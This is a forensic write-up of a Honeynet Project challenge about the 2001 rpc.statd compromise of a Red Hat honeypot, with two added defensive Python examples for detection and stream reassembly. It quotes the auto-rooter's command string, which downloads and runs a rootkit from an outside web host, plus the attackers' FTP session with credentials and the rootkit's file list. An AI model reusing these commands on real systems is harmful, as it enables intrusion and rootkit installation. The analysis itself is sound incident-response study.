Synopsis:

On March 15, 2001 a Honeynet Project system running Redhat Linux 6.2 was compromised using a well-known vulnerability in rpc.statd. The attack was executed from a system (211.185.125.124) owned by the Kyongsan Purim Elementary School (KPES) located in Kyongbuk state, South Korea. However, the intruders appear to be of Romanian nationality. It is likely that the attackers compromised the system belonging to the KPES and used it as a "jump point" to attack the honeynet system.

Virtually all aspects of the attack were automated. The intruder's automation tools were all derivatives of tools widely available on the Internet.

Systems:

Victim
  Hostname: asdf1
  OS: Redhat Linux 6.2 (2.2.14-5.0)
  IP: 172.16.1.108
  Hardware: Intel Pentium 200 MMX
  Disk: approximately 4 GB of mounted storage

Attacker
  OS: Probably Redhat Linux 6.2
  IP: 211.185.125.124 (allocated to the Kyongsan Purim Elementary School (KPES) in South Korea)

Chain of events:

03/15/2001 20:21:23

The KPES machine begins port 111 scans of the IP range 172.16.1.101 - 172.16.1.108. The only hosts found to be running the portmapper are 172.16.1.103 and 172.16.1.108.

03/15/2001 20:21:24

The KPES machine sends an RPC query to 172.16.1.103 to obtain the port number for rpc.statd. The target machine responds that rpc.statd is on port 32773.

03/15/2001 20:21:24

The KPES machine attempts the rpc.statd buffer overflow attack against 172.16.1.103. The attack fails: 172.16.1.103, which is running Solaris 7, does not appear to be vulnerable to this particular exploit (NOTE: if the .103 machine is SPARC architecture it is definitely not vulnerable to this exploit, as the shellcode has been written for the x86 platform). The attacking machine makes no further attempt to compromise this system via rpc.statd.

03/15/2001 20:21:24

The KPES machine sends an RPC query to 172.16.1.108 to obtain the port number for rpc.statd. The victim machine responds that rpc.statd is on port 931.

03/15/2001 20:21:25

The KPES machine attempts the rpc.statd buffer overflow attack against 172.16.1.108. The attack is successful and binds a shell to port 39168.

03/15/2001 20:21:36

The KPES machine establishes a connection with 172.16.1.108 on port 39168 and executes the following sequence of commands:

1. cd /; uname -a; id;

2. ftp -v ftp.home.ro

	USER soane
	PASS i2ttgcj1d
	SYST
	TYPE I
	PORT 172,16,1,108,4,3
	RETR lk.tgz
	QUIT

3. tar -zxvf lk.tgz

4. cd last

5. ./install

03/15/2001 20:45

The KPES machine closes all open connections to 172.16.1.108.

03/15/2001 20:46:15

172.16.1.108 establishes the first of two SMTP sessions, to mta-v15.mail.yahoo.com (216.136.129.14, for bidi_damm@yahoo.com) and then to outblaze.com (209.61.188.33, for last@linuxmail.org). Both sessions attempt to send the attackers a message reporting the successful attack and relevant system information. Only the message to the Yahoo account was delivered; the outblaze.com server rejected the message because the victim's sender domain (asdf1) does not exist.

220 YSmtp mta502.mail.yahoo.com ESMTP service ready
EHLO asdf1
250-mta502.mail.yahoo.com
250-8BITMIME
250-SIZE 3145728
250 PIPELINING
MAIL From: SIZE=836
250 sender  ok
RCPT To:
250 recipient  ok
DATA
354 go ahead
Received: (from root@localhost)
	by asdf1 (8.9.3/8.9.3) id TAA00952
	for bidi_damm@yahoo.com; Thu, 15 Mar 2001 19:46:05 -0600
Date: Thu, 15 Mar 2001 19:46:05 -0600
From: root 
Message-Id: <200103160146.TAA00952@asdf1>
To: bidi_damm@yahoo.com
Subject: roote

* Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
* Hostname : asdf1
* IfConfig :           inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0
          inet addr:172.16.1.108  Bcast:172.16.1.255  Mask:255.255.255.0
* Uptime :   7:45pm  up  8:23,  0 users,  load average: 0.00, 0.00, 0.00
* Cpu Vendor ID : vendor_id	: GenuineIntel
* Cpu Model : model		: 4
model name	: Pentium MMX
* Cpu Speed: cpu MHz		: 200.457171
* Bogomips: bogomips	: 399.77
* Spatiu Liber: Filesystem            Size  Used Avail Use% Mounted on
/dev/hda8             251M   33M  205M  14% /
/dev/hda1              23M  2.4M   19M  11% /boot
/dev/hda6             1.6G  2.1M  1.5G   0% /home
/dev/hda5             1.6G  367M  1.2G  23% /usr
/dev/hda7             251M  5.3M  232M   2% /var
.
250 ok dirdel
QUIT
221 mta502.mail.yahoo.com

03/15/2001 20:46:23

172.16.1.108 establishes the second SMTP session with an outblaze.com (209.61.188.33) server:

220 spf2.us3.outblaze.com ESMTP Sendmail 8.11.2/8.11.2; Fri, 16 Mar 2001 01:46:24 GMT
EHLO asdf1
250-spf2.us3.outblaze.com Hello IDENT:root@asdf1.xxxxxxxxxxxxxxxxxx.xxx [172.16.1.108], pleased to meet you
250-ENHANCEDSTATUSCODES
250-EXPN
250-VERB
250-8BITMIME
250-SIZE 10000000
250-DSN
250-ONEX
250-ETRN
250-XUSR
250 HELP
MAIL From: SIZE=838
501 5.1.8 ... Domain of sender address root@asdf1 does not exist
QUIT
221 2.0.0 spf2.us3.outblaze.com closing connection
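The sequence above (a port 111 sweep, the portmapper lookup, then a connection to the freshly bound shell on port 39168) is what a network sensor should flag. This is an added detection example, not part of the original write-up or of any tool it names; it runs over constructed flow records shaped like the timeline, and the thresholds, window and function names are assumptions.

```python
"""Flag a portmap sweep followed by a connection to the bound-shell port."""
from collections import defaultdict
from datetime import datetime, timedelta

SWEEP_PORT = 111                     # portmapper, the scanner's first probe
BACKDOOR_PORT = 39168                # shell port bound by the statd exploit
SWEEP_MIN_HOSTS = 4                  # distinct targets to call it a sweep (assumed)
SWEEP_WINDOW = timedelta(seconds=5)  # assumed

# Constructed flow records (timestamp, src, dst, dport) mirroring the timeline.
FLOWS = [
    ("2001-03-15 20:21:23", "211.185.125.124", f"172.16.1.{i}", 111)
    for i in range(101, 109)
] + [
    ("2001-03-15 20:21:24", "211.185.125.124", "172.16.1.103", 32773),
    ("2001-03-15 20:21:24", "211.185.125.124", "172.16.1.108", 931),
    ("2001-03-15 20:21:36", "211.185.125.124", "172.16.1.108", 39168),
    ("2001-03-15 20:30:00", "172.16.1.50", "172.16.1.108", 22),  # benign noise
]

def parse(flows):
    return [(datetime.strptime(t, "%Y-%m-%d %H:%M:%S"), s, d, p) for t, s, d, p in flows]

def find_sweeps(flows):
    """Return {src: sweep start} for sources probing >= SWEEP_MIN_HOSTS
    distinct targets on SWEEP_PORT inside SWEEP_WINDOW."""
    by_src = defaultdict(list)
    for ts, src, dst, port in sorted(parse(flows)):
        if port == SWEEP_PORT:
            by_src[src].append((ts, dst))
    sweeps = {}
    for src, hits in by_src.items():
        for i, (t0, _) in enumerate(hits):
            targets = {d for t, d in hits[i:] if t - t0 <= SWEEP_WINDOW}
            if len(targets) >= SWEEP_MIN_HOSTS:
                sweeps[src] = t0
                break
    return sweeps

def find_backdoor_use(flows):
    """Pair each sweep with later connections from the same source to the
    backdoor port. Returns [(src, victim, seconds after sweep began)]."""
    sweeps = find_sweeps(flows)
    hits = []
    for ts, src, dst, port in sorted(parse(flows)):
        if port == BACKDOOR_PORT and src in sweeps and ts >= sweeps[src]:
            hits.append((src, dst, int((ts - sweeps[src]).total_seconds())))
    return hits

if __name__ == "__main__":
    for src, victim, delay in find_backdoor_use(FLOWS):
        print(f"{src} swept port 111, then reached {victim}:{BACKDOOR_PORT} {delay}s later")
```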

Questions:

1. The attackers used the rpc.statd attack to get into the system. What modifications did they make to the break in process to both automate and make the process faster?

The attackers automated most aspects of the attack, including the scanning for vulnerabilities, execution of the exploit, backdoor setup, rootkit transfer and installation, and system egress. The profile of the attack is similar to the one provided by the luckroot exploitation package and xzibit rootkit from Scan 13. The luckroot "auto rooter" package is comprised of three components: the luckgo script, the luckscan-a RPC scanner, and the luckstatdx rpc.statd exploit. The luckgo script runs luckscan-a against a block of addresses; if luckscan-a finds a system with port 111 open it runs the luckstatdx exploit against that host. If the attack is successful a shell is bound to port 39168. luckstatdx then opens a socket to port 39168 on the victim machine and pipes the following string to the shell:

cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n.

For the most part, this is identical to the commands executed on the honeynet system. The only differences are that FTP was used to transfer the rootkit to the victim machine, and that the rootkit had a different name and other minor customizations (directory name, IPs, etc.). The complete reassembled session follows:

cd /; uname -a; id;
Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
uid=0(root) gid=0(root)
ftp -v ftp.home.ro
Connected to ftp.home.ro.
220-
220-
220-                           H O M E  .  R  O
220-
220-                 This server is for HOME.RO members only.
220-                  Go to http://www.home.ro/ to register.
220-
220-                      No anonymous access allowed.
220-
220-
220 ProFTPD 1.2.0rc3 Server (HOME.RO Members FTP) [193.231.236.41]
soane
Name (ftp.home.ro:root): 331 Password required for soane.
Password:i2ttgcj1d
230 User soane logged in.
get lk.tgz
Remote system type is UNIX.
Using binary mode to transfer files.
local: lk.tgz remote: lk.tgz
200 PORT command successful.
150 Opening BINARY mode data connection for lk.tgz (520333 bytes).
226 Transfer complete.
bye
520333 bytes received in 35.5 secs (14 Kbytes/sec)
421 Idle Timeout (240 seconds): closing control connection.
tar -zxvf lk.tgz
last/
tar: Archive contains future timestamp 2002-02-08 07:08:13
last/ssh
last/pidfile
last/install
last/linsniffer
last/cleaner
last/inetd.conf
last/lsattr
last/services
last/sense
last/ssh_config
last/ssh_host_key
last/ssh_host_key.pub
last/ssh_random_seed
last/sshd_config
last/sl2
last/last.cgi
last/ps
last/netstat
last/ifconfig
last/top
last/logclear
last/s
last/mkxfs
cd last
./install
********* Instalarea Rootkitului A Pornit La Drum *********
********* Mircea SUGI PULA ********************************
********* Multumiri La Toti Care M-Au Ajutat **************
********* Lemme Give You A Tip : **************************
********* Ignore everything, call your freedom ************
********* Scream & swear as much as you can ***************
********* Cuz anyway nobody will hear you and no one will *
********* Care about you **********************************


Are Make !
Are Gcc !
Nu Are Ssh !
* Inlocuim nestat ... alea alea * Gata...
* Dev... 

* Gata
* Facem Director...Si Mutam Alea.. 
* Copiem ssh si alea



* Adaugam In Startup:) ...
* Luam Informatiile dorite ...
* Gata ! Trimitem Mailul ...Asteapta Te Rog 
* Am trimis mailul ... stergem fisierele care nu mai trebuie .


* G A T A *

* That Was Nice Last

2. What system/country did the badguys come in from?

The attack was executed from a system (211.185.125.124) belonging to the Kyongsan Purim Elementary School (KPES) located in Kyongbuk state, South Korea. This system appears to be an x86 based system running Redhat Linux 6.2. It is likely that the intruders compromised the KPES system using techniques similar to those used to exploit 172.16.1.108 and used it as a "jump point" for the attack.

3. What nationality are the badguys, and how were you able to determine this?

The intruder's nationality is likely Romanian. The assumption is based on the following observations:

a. The rootkit was transferred from a Romanian FTP server, s1.home.ro (193.231.236.41) to the compromised host.

b. The rootkit installed on the compromised system has been customized to hide connections from the following 3 Romanian allocated address blocks: 192.254.34.x (logicnet.ro, ssigl.ro, sico.ro, Craiova.LogicTL.Net), 193.231.139.x (edu.ro, lgcb.ro, roedu.net), and 213.154.137.x (efesromania.pcnet.ro, fides.ro, urziceni.ro, slobozia.ro, pcnet.ro).

c. The rootkit installation script contains various comments in Romanian, whereas the original script from the xzibit kit contains only English comments. Therefore, it is likely that the modifications made to the original kit were done by native Romanian speakers.

4. What do the answers to questions #1 and #2 tell us about the tactics the badguys are using?

a. The attackers are unlikely to have the ability to write their own exploits and support tools, and are therefore mostly dependent on publicly available exploits and tools.

b. The attackers' tactic is to compromise as many systems as possible in as short a time as possible.

c. The attackers will use intermediate hosts as "jump points" in an effort to obfuscate the origin of the attacks and avoid attribution.

d. The attackers will execute attacks without regard for their own operational security.

5. What did you learn from this challenge?

Retracing the attackers' footsteps and analyzing the automation of the attack was interesting. Though the techniques used by the intruders are not new, it is interesting to see how techniques and tools are employed in the wild.

6. How long did this challenge take you?

Approximately 8 hours.

Bonus Question:

Can you recover the blackhat's rootkit from the Snort binary log file? If so, how?

Yes, the rootkit can be retrieved by reassembling the ftp-data stream associated with the transfer of the rootkit to the compromised system. I used Ethereal to reassemble the stream and extract the rootkit from the Snort log. The rootkit contained the following files:

drwxr-xr-x 1031/users        0 2001-02-26 15:40:30 last/
-rwxr-xr-x 1031/users   611931 2002-02-08 08:08:13 last/ssh
-rw-r--r-- 1031/users        1 2001-02-26 10:29:58 last/pidfile
-rwx------ 1031/users     3713 2001-03-02 22:08:37 last/install
-rwx------ 1031/users     7165 2001-02-26 10:22:50 last/linsniffer
-rwxr-xr-x 1031/users     1345 1999-09-09 11:57:11 last/cleaner
-rw-r--r-- 1031/users     3278 2001-01-27 10:11:32 last/inetd.conf
-rwxr-xr-x 1031/users       79 2001-02-26 10:28:40 last/lsattr
-rw-r--r-- 1031/users    11407 2001-01-27 10:11:44 last/services
-rwxr-xr-x 1031/users     4060 2001-02-26 10:22:55 last/sense
-rw-r--r-- 1031/users      880 2000-10-22 15:29:44 last/ssh_config
-rw------- 1031/users      540 2000-10-22 15:29:44 last/ssh_host_key
-rw-r--r-- 1031/users      344 2000-10-22 15:29:44 last/ssh_host_key.pub
-rw------- 1031/users      512 2000-10-22 15:29:44 last/ssh_random_seed
-rw-r--r-- 1031/users      688 2001-02-26 10:29:51 last/sshd_config
-rwx------ 1031/users     8268 2001-02-26 10:22:59 last/sl2
-rwxr-xr-x 1031/users     4620 2001-02-26 10:23:10 last/last.cgi
-rwxr-xr-x 1031/users    33280 2001-02-26 10:23:33 last/ps
-rwxr-xr-x 1031/users    35300 2001-02-26 10:23:42 last/netstat
-rwxr-xr-x 1031/users    19840 2001-02-26 10:23:47 last/ifconfig
-rwxr-xr-x 1031/users    53588 2001-02-26 10:23:55 last/top
-rwx------ 1031/users       75 2001-02-26 10:24:03 last/logclear
-rw-r--r-- root/root       708 2001-03-02 22:05:12 last/s
-rwxr-xr-x 1031/users   632066 2001-02-26 09:46:04 last/mkxfs
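The reassembly step Ethereal performs on the ftp-data stream, shown as an added example (not the write-up's own procedure and not a tool it names): order the captured TCP segments by sequence number, drop retransmitted bytes, refuse a stream with gaps, then confirm the result is a gzip'd tar and list its members. Capture parsing is left to Ethereal; the block works on constructed (seq, payload) segments of a stand-in archive, and all function names are assumptions.

```python
"""Rebuild a file carried in an ftp-data TCP stream and inspect it as a tarball."""
import io, random, tarfile

def reassemble(isn, segments):
    """Order segments by sequence number relative to the sender's ISN, trimming
    overlap and skipping full retransmissions. A gap raises, because a
    partial archive is useless as evidence."""
    data = bytearray()
    expected = isn + 1                       # first data byte follows the SYN
    for seq, payload in sorted(segments, key=lambda s: s[0]):
        if seq + len(payload) <= expected:   # whole segment already seen
            continue
        if seq > expected:
            raise ValueError(f"gap in stream at seq {expected}")
        data += payload[expected - seq:]     # drop the overlapping prefix
        expected = seq + len(payload)
    return bytes(data)

def archive_members(data):
    """Check the gzip magic, then return the tar member names."""
    if data[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip stream")
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tf:
        return tf.getnames()

def build_sample_tgz():
    """Constructed stand-in for lk.tgz using two member names from the listing."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, body in (("last/install", b"#!/bin/sh\n"),
                           ("last/ps", b"\x7fELF" + bytes(600))):
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tf.addfile(info, io.BytesIO(body))
    return buf.getvalue()

def segment(data, isn, mss=400):
    """Split into MSS-sized segments, shuffle them and duplicate one, mimicking
    out-of-order capture and a retransmission."""
    segs = [(isn + 1 + off, data[off:off + mss]) for off in range(0, len(data), mss)]
    random.shuffle(segs)
    return segs + [segs[0]]

if __name__ == "__main__":
    tgz = build_sample_tgz()
    recovered = reassemble(4000, segment(tgz, 4000))
    print(len(recovered), "bytes;", archive_members(recovered))
```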

I would like to thank the Honeynet Project for providing this exercise. It was a lot of fun.

Regards,
Jack Hayes